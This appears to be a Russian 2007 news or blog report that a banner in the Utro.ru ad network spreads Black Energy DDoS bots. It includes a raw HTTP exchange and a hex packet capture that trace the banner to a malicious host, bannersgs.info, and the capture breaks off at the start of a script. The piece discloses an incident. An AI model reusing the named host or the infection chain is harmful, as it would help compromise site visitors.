Специалисты предупредили РБК, но вредоносный баннер до сих пор крутится в сетке Utro.ru и заражает компьютеры ботами - а те, в свою очередь, заваливают "заказанные" сайты. Называется этот ботнет Black Energy, и его автор, по некоторым сведениям - наш соотечественник.

Западные эксперты отмечают, что в последнее время ботнеты все чаще приходят из России. В конце ноября ФБР рапортовало о завешении второй части операции Bot Roast по борьбе с ботнетами у себя в США. В то же время в Рунете как раз в ноябре стали ходить рассылки с рекламой услуг про организации DDoS-атак с помощью ботнетов. А теперь дошло и до баннерной сети Utro.ru в качестве рекламной площадки.

Стоит отметить также, что это уже третий в этом году случай распространения вредоносных кодов через проекты РБК. В июле благодаря предыдущему заражению баннерной сети Utro.ru несколько известных новостных сайтов стали распространителями трояна, который занимался кражей идентификационных данных пользователей Quik. Ранее в июне трояны для кражи паролей распространялись через главный сайт РБК.

Подробности:
GET /cgi-bin/banner/utro?82779&options=FN' HTTP/1.1
Host: www.txt.utro.ru
User-Agent: Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.8.1.11) Gecko/20071204 Ubuntu/7.10 (gutsy) Firefox/2.0.0.11
Accept: */*
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.utro.ru/includes5/banners/advert_part.html
Cookie: __utma=143070705.897126579.1189666299.1196144486.1196938604.33;
__utmz=143070705.1194419286.21.3.utmccn=(referral)|utmcsr=ytro.ru|utmcct=/|utmcmd=referral; uid=1463242514; __utmb=143070705; __utmc=143070705
HTTP/1.1 200 OK
Date: Thu, 06 Dec 2007 11:24:48 GMT
Server: Apache/1.3.33 (Unix)
Content-Length: 648
Connection: close
Content-Type: application/x-javascript
document.close();
parent.document.getElementById('utxt82779').parentNode.innerHTML="5 баллов: Московский школьник признался в убийстве 37 человек\r\n
\r\n";

45 00 01 47 47 98 40 00 76 06 1d 79 0a 40 5e 63 E..GG.@.v..y.@^c
42 24 f3 d8 09 8f 00 50 7f a6 84 fd df a4 aa 51 B$.....P.......Q
50 18 fa f0 63 de 00 00 47 45 54 20 2f 73 74 61 P...c...GET /sta
74 2f 69 6e 64 65 78 2e 70 68 70 20 48 54 54 50 t/index.php HTTP
2f 31 2e 31 0d 0a 41 63 63 65 70 74 3a 20 2a 2f /1.1..Accept: */
2a 0d 0a 52 65 66 65 72 65 72 3a 20 68 74 74 70 *..Referer: http
3a 2f 2f 77 77 77 2e 35 62 61 6c 6c 6f 76 2e 72 ://www.5ballov.r
75 2f 65 78 74 65 72 6e 61 6c 2f 62 61 6e 6e 65 u/external/banne
72 73 2e 70 68 70 3f 66 69 6c 65 3d 62 6c 6f 63 rs.php?file=bloc
6b 73 2f 6e 65 77 73 5f 75 74 72 6f 2e 74 70 6c ks/news_utro.tpl
0d 0a 41 63 63 65 70 74 2d 4c 61 6e 67 75 61 67 ..Accept-Languag
65 3a 20 72 75 0d 0a 41 63 63 65 70 74 2d 45 6e e: ru..Accept-En
63 6f 64 69 6e 67 3a 20 67 7a 69 70 2c 20 64 65 coding: gzip, de
66 6c 61 74 65 0d 0a 55 73 65 72 2d 41 67 65 6e flate..User-Agen
74 3a 20 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 t: Mozilla/4.0 (
63 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 compatible; MSIE
20 36 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 6.0; Windows NT
20 35 2e 31 29 0d 0a 48 6f 73 74 3a 20 62 61 6e 5.1)..Host: ban
6e 65 72 73 67 73 2e 69 6e 66 6f 0d 0a 43 6f 6e nersgs.info..Con
6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c nection: Keep-Al
69 76 65 0d 0a 0d 0a ive....
45 00 05 dc 0f 41 40 00 34 06 93 3b 42 24 f3 d8 E....A@.4..;B$..
0a 40 5e 63 00 50 09 8f df a4 aa 51 7f a6 86 1c .@^c.P.....Q....
50 10 19 20 f5 b4 00 00 48 54 54 50 2f 31 2e 31 P.. ....HTTP/1.1
20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 54 200 OK..Date: T
68 75 2c 20 30 36 20 44 65 63 20 32 30 30 37 20 hu, 06 Dec 2007
32 32 3a 34 33 3a 33 31 20 47 4d 54 0d 0a 53 65 22:43:31 GMT..Se
72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 32 rver: Apache/2.2
2e 36 20 28 46 65 64 6f 72 61 29 0d 0a 58 2d 50 .6 (Fedora)..X-P
6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 owered-By: PHP/5
2e 31 2e 36 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 .1.6..Content-Le
6e 67 74 68 3a 20 34 33 38 38 0d 0a 43 6f 6e 6e ngth: 4388..Conn
65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 ection: close..C
6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 ontent-Type: tex
74 2f 68 74 6d 6c 0d 0a 0d 0a 20 20 20 20 20 20 t/html....
20 20 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69